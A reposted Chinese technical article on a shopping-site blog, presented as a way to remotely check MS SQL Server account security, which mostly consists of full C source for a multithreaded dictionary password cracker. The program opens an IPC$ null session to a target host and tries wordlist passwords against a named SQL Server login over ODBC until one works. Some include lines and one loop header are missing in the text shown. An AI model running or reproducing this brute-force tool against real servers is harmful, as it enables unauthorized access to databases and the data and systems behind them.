开店乐

开店乐电子商务研究 KaiDianLe.Com

网站地图 :

  搜索:

远程检测MS SQL Server账号安全性

     

ODBC是开放数据互连(Open Database Connectivity)的简称,它是一个用于远程访问数据库(主要是关系型数据库)的统一界面标准。【来源:开店乐www.KaiDianLe.Com

ODBC下现实运用中是一个数据库的访问库,它提供了一组ODBC API函数可以提供给编程者使用。对于程序员来说,ODBC API函数集实际上等于一个动态连接库(DLL)集,可以在应用程序中直接使用它们。

一个应用程序直接调用ODBC API函数来进行数据库的应用工作,工作过程一般比较复杂。其中一种办法大概是以下几步:

<1>启动ODBC数据库应用程序。

<2>与服务器建立IPC SESSION。

<3>创建数据库应用的环境句柄。

<4>创建连接句柄。

<5>连接数据源。

<6>创建语句句柄。

<7>通过上一步创建的语句句柄来执行SQL操作。

<8>释放语句句柄。

<9>要进行多此SQL操作的话,就循环步骤6-8。

<10>断开与数据库的连接。

<11>释放连接句柄。

<12>释放环境句柄。

<13>断开IPC SESSION。

<14>程序结束。

下面以一个实例来说明远程检测MS SQL Server账号密码的全过程。

/**********************************************************

Module Name:SQLCheck.c

Date:2000.12.14

WEB:www.patching.net

Notices:Copyright(c) eyas

**********************************************************/

#include

#include

#include

#include

#include

#include

#include

#include

////////////////////////////////////////////////////////////////////////

file://定义全局变量

char dict[20000][40],//密码字典

UserName[40],//用户名

target[40],//目标服务器

passwd[40];//已经探测出来的正确密码

int total=0;//字典里面单词数量

BOOL Cracked=FALSE;//探测密码成功时此值为TRUE

HANDLE hSemaphore,//信标内核对象

hEvent;//事件内核对象

long MaxThreads,//最大线程数量

ActiveThreads;//活动线程数量

////////////////////////////////////////////////////////////////////////

void usage(char *pragname)

{

printf("\nPower by eyas"

"\nhttp://www.patching.net"

"\n2000/12/14"

"\n\nUsage:%s "

"\nExample:%s 192.168.0.1 sa c:\\pwd.dic 50\n",pragname,pragname);

return;

}

////////////////////////////////////////////////////////////////////////

int ReadDic(char *dic)

{

FILE *fp;

char tmp[40];

file://打开字典文件

if((fp=fopen(dic,"r"))==NULL)

{

printf("\nCan't open %s",dic);

return 1;

}

while(!feof(fp))

{

file://读取数据到临时变量

if(fgets(tmp,40,fp)==NULL)

break;

file://把从文件里面读出来的最后一位数据[换行符号]去掉

strncpy(dict[total],tmp,strlen(tmp)-1);

total++;

if(total>=19999)

break;

}

fclose(fp);

return 0;

}

////////////////////////////////////////////////////////////////////////

int ConnIPC(char *RemoteName)

{

NETRESOURCE nr;

DWORD flags=CONNECT_UPDATE_PROFILE;

TCHAR RN[30]="\\\\",

LN[5]="";

strcat(RN,RemoteName);

strcat(RN,"\\ipc$");

nr.dwType=RESOURCETYPE_DISK;

nr.lpLocalName=(LPTSTR)&LN;

nr.lpRemoteName=(LPTSTR)&RN;

nr.lpProvider=NULL;

if(WNetAddConnection2(&nr,(LPSTR)"",(LPSTR)"",flags)==NO_ERROR)

{

return 0;

}

else

{

return 1;

}

}

////////////////////////////////////////////////////////////////////////

int DelIPC(char *RemoteName)

{

DWORD ret;

TCHAR lpName[30]="\\\\";

strcat(lpName,RemoteName);

strcat(lpName,"\\ipc$");

ret=WNetCancelConnection2(lpName,CONNECT_UPDATE_PROFILE,TRUE);

if(ret==NO_ERROR)

{

return 0;

}

else

{

return 1;

}

}

////////////////////////////////////////////////////////////////////////

DWORD WINAPI SQLCheck(PVOID pPwd)

{

file://定义局部变量

char szBuffer[1025];

char *pwd;

SWORD swStrLen;

SQLHDBC hdbc;

SQLHANDLE henv;

SQLRETURN retcode;//ODBC API运行返回值

SCHAR ConnStr[200];//连接数据库字符串

long PreviousCount;

file://取得传递过来准备探测的密码

pwd=(char *)pPwd;

file://构造连接数据库字符

sprintf(ConnStr,"DRIVER={SQL Server};SERVER=%s;UID=%s;PWD=%s;DATABASE=master",

target,UserName,pwd);

file://puts(ConnStr);

__try{

file://创建数据库应用的环境句柄

if (SQLAllocHandle(SQL_HANDLE_ENV,SQL_NULL_HANDLE,&henv) !=SQL_SUCCESS)

{

printf("\nAllocate environment handle failed.\n");

ExitProcess(1);

}

file://设置ODBC版本环境

if (SQLSetEnvAttr(henv, SQL_ATTR_ODBC_VERSION,(SQLPOINTER)

SQL_OV_ODBC3, SQL_IS_INTEGER) != SQL_SUCCESS)

{

printf("\nSet the ODBC version environment attribute failed.\n");

SQLFreeHandle(SQL_HANDLE_ENV, henv);

ExitProcess(1);

}

file://创建连接句柄

if ((retcode= SQLAllocHandle(SQL_HANDLE_DBC,henv,(SQLHDBC FAR

*)&hdbc)) != SQL_SUCCESS)

{

printf("\nAllocate connection handle failed.\n");

SQLFreeHandle(SQL_HANDLE_ENV, henv);

ExitProcess(1);

}

file://连接数据源

retcode= SQLDriverConnect(hdbc,NULL,ConnStr,strlen(ConnStr),

szBuffer,sizeof(szBuffer),&swStrLen,

SQL_DRIVER_COMPLETE_REQUIRED);

if(retcode!=SQL_SUCCESS && retcode != SQL_SUCCESS_WITH_INFO)

{

file://连接失败,函数终止

file://printf("\nCouldn't connect to %s MSSQL server.\n",target);

}

else

{

file://连接远程MSSQL Server数据库成功

Cracked=TRUE;

strncpy(passwd,pwd,sizeof(passwd));

file://断开连接

SQLDisconnect(hdbc);

}

}//end of tyr

__finally{

file://释放连接句柄

SQLFreeHandle(SQL_HANDLE_DBC, hdbc);

file://释放环境句柄

SQLFreeHandle(SQL_HANDLE_ENV, henv);

file://对信标当前资源数量进行递增1,并取得当前资源数量的原始值

ReleaseSemaphore(hSemaphore,1,&PreviousCount);

file://计算当前活动线程数量

ActiveThreads=MaxThreads-PreviousCount-1;

file://printf("\nActiveThreads-->%d.",ActiveThreads);

file://如果活动线程数量为0,那么将事件内核对象hEvent改为已通知状态,程序结束

if(ActiveThreads==0)

{

SetEvent(hEvent);

}

}//end of finally

return 0;

}

////////////////////////////////////////////////////////////////////////

int main(int argc,char **argv)

{

HANDLE hThread;//线程句柄

DWORD dwThreadId,dwRet;

int i=0,err=0;

clock_t start,end;//程序运行的起始和结束时间

double duration;

if(argc!=5)

{

usage(argv[0]);

return 1;

}

file://取得目标地址,用户名

strncpy(target,argv[1],sizeof(target));

strncpy(UserName,argv[2],sizeof(UserName));

file://取得并检查用户输入的最大线程数量

MaxThreads=atol(argv[4]);

if((MaxThreads>100) || (MaxThreads<1))

{

usage(argv[0]);

return 1;

}

file://读取字典中的单词到内存中

if(ReadDic(argv[3])!=0)

return 1;

file://与目标机器建立IPC Session

if(ConnIPC(argv[1])!=0)

{

printf("\nCan't built IPC NULL Session!");

return 1;

}

else

{

printf("\nBuilt IPC NULL Session success!\n");

}

file://创建信标内核对象,最大资源数量和可以使用的资源数量均为MaxThreads

hSemaphore=CreateSemaphore(NULL,MaxThreads,MaxThreads,NULL);

if(hSemaphore==NULL)

{

printf("\nCreateSemaphore() failed.ErrorCode:%d.",GetLastError());

return 1;

}

file://创建事件内核对象[人工重置,初始状态为未通知]

hEvent=CreateEvent(NULL,TRUE,FALSE,NULL);

if(hEvent==NULL)

{

printf("\nCreateEvent() failed.ErrorCode:%d.",GetLastError());

CloseHandle(hSemaphore);

return 1;

}

file://开始计时

start=clock();

file://开始建立线程探测密码

for(i=0;i {

file://探测密码成功后跳出此循环

if(Cracked==TRUE)

break;

file://显示进度信息

printf("\n[%d/%d] %s -> %s -> %s",i+1,total,target,UserName,dict[i]);

file://创建线程

hThread=CreateThread(NULL,0,SQLCheck,(PVOID)&dict[i],0,&dwThreadId);

file://处理创建线程错误的情况

if(hThread==NULL)

{

err++;

MessageBox(NULL,"thread error","error",MB_OK);

if(err>=50)

break;

}

CloseHandle(hThread);

Sleep(10);

file://等待信标内核对象通知,可用资源数量大于0则继续创建线程,等于0则线程进入等待状态

WaitForSingleObject(hSemaphore,INFINITE);

}

file://等待事件内核对象通知,最多等待3分钟

dwRet=WaitForSingleObject(hEvent,180000);

switch(dwRet)

{

case WAIT_OBJECT_0:

printf("\nAll thread done.");

break;

case WAIT_TIMEOUT:

printf("\nWait time out.Exit.");

break;

case WAIT_FAILED:

printf("\nWaitForSingleObject() failed.");

break;

}

file://断开与目标机器的IPC Session

DelIPC(target);

file://探测密码成功后回显信息

if(Cracked==TRUE)

printf("\n\nSuccess!%s SQL Server User [%s] passwd is [%s].",target,UserName,passwd);

file://记时结束

end=clock();

file://转换时间格式

duration = (double)(end - start) / CLOCKS_PER_SEC;

file://显示所用时间

printf("\n\nComplete.Use %2.1f seconds.\n",duration);

return 0;

}

////////////////////////////////////////////////////////////////////////

程序在windows2000,vc++6.0环境下编译通过。

【日期:2006-8-7】【作者:不祥】【转载自:开店乐】

相关文章:
 最好的网上开店系统:凡人网络购物系统免费下载
 SQL Server存储过程编写和优化措施
 SQL Server日志文件丢失的恢复方法
 SQL Server2000数据库系统表的应用
 品味SQL Server 2005的几个新功能
 SQL Server2000 索引结构及其使用
 SQL Server 中的几个函数要记录
 用SQL存储过程实现批量插入数据
 获取SQL Server服务器的当前连接数
 记存储过程中经常用到的本周\本月\本年函数
 数据库安全--应用IDS保卫数据库
 远程连接SQL Server服务器的解决方案
 SQL Server数据库定时自动备份
 升级到SQLServer2005的10大理由
 攻破SQL服务器的十种方法
 SQL Server安全规划全攻略
 SQL Server 服务器安装剖析
 大型数据库的SQL查询优化技巧
 优化SQL Server服务器内存配置的策略
 SQL服务器外网IP测试故障解决
 SQL SERVER 2000 SP4新特性概述
 Access与Sql Server之ASP代码比较
 通过作业定时同步服务器上的数据
 比较两个数据库的表结构差异
 不破坏原加密存储的存储解密
 优化--让你的SQL运行速度明显提高
 SQL Server数据库的备份与恢复
 数据库学习:查询区分大小写
 查询指定的表在那些数据库中存在
 Web环境下SQL中数据的磁带备份与恢复
 SQL Server里函数的两种用法
 SQL语法参考手册
 SQL数据库的六种数据移动方法
 Access转换成为SQL Server
 数据变换和转换注意事项(SQL)
 SQL语句性能调整原则
 SQL实现从数据库中随机抽N条记录
 怎样能限制SQL Server只能让指定的机器连接
 SQL存储过程入门与提高
 SQL Server端口更改后的数据库连接方式
 怎样设置SQL Server的用户及权限
 关于SQL语句查询分页数据的解决方案
 关于sql数据库维护失败的问题查找方法
 SQL Server与Excel数据互导
 减少动态SQL语句的预编译时间
 一个完整的SQL SERVER数据库全文索引的示例
 如何让你的SQL运行得更快
 MS-SQL server数据库开发精典技巧
 MSSQL按分页返回查询结果的存储过程
 MySQL 4.1.0 中文参考手册[连载]
 数据库访问技术
 SQL语言快速入门
 JDBC驱动程序的类型
 Microsoft的MSDN里面对ODBC的介绍
 JDBC1.2中几个最重要的接口和类
 SQL7.0储存过程调试
 UDA技术综述
 SQL Server的存储过程调用Com组件
 通过HTTP访问SQL Server 2000
 数据库应用程序需注意的问题
 SQL Server安全性简介
 用COM自动服务扩展SQL Server功能
 全面接触SQL语法
 SQL Server 2005数据库升级要点和技巧
 多条件数据库查询的优化方法
 如何解决SQL Server服务器耗尽内存的情况
 SQL Server的空值处理策略
 利用数据库日志恢复数据到时间点的操作
 得出SQL语句的执行时间的方法
 SQL Server2000数据库文件损坏时如何恢复
 在SQL Server 2000里设置和使用数据库复制
 修改系统密码后SQL服务器无法启动解决
 远程检测MS SQL Server账号安全性
 基于角色的方式管理SQL Server安全
 针对MS SQL SERVER的安全防御方案
 SQL Server补丁安装常见问题
 保护SQL Server:为安全性而安装
 SQL Server数据库安全规划全攻略
 SQL Server 2000 客户端实用程序小技巧
 SQL Server到Oracle连接服务器的实现
 把Access数据库移植到SQL
 避免Access和SQL Server的空值冲突
 用SQL Server保持会话状态
 两个SQL Server维护技巧
 Sql Server全文搜索中文出错的问题
 SQL Server备份的三个恢复模型
 利用BCP恢复SQL Server 2000数据库
 常用SQL字符串函数问题集锦
 SQL语句--如何替换字符串中的个别字符?
 MSSQL Ntext中的字段替换处理存储过程
 SQL中将一列数据分成三列来显示的方法
 SQL SERVER中替换text,ntext列中的字符串
 SQL存储过程来建立自动备份数据库
 Microsoft SQL Server 数据库维护计划
 两台Sql Server数据同步解决方案
 用SHA1或MD5 对用户身份验证的简单实现
 SQL Server开发的二十一条军规
 一个四用户信息同步更新的存储过程
 SQL Server中如何计算农历
 SQL Server安全设置清单列表
 SQL Server存储过程入门与提高

版权所有:Kaidianle.Com  联系方式:Shnxn@Yhaoo.Com.Cn 京ICP备06028743号 在线留言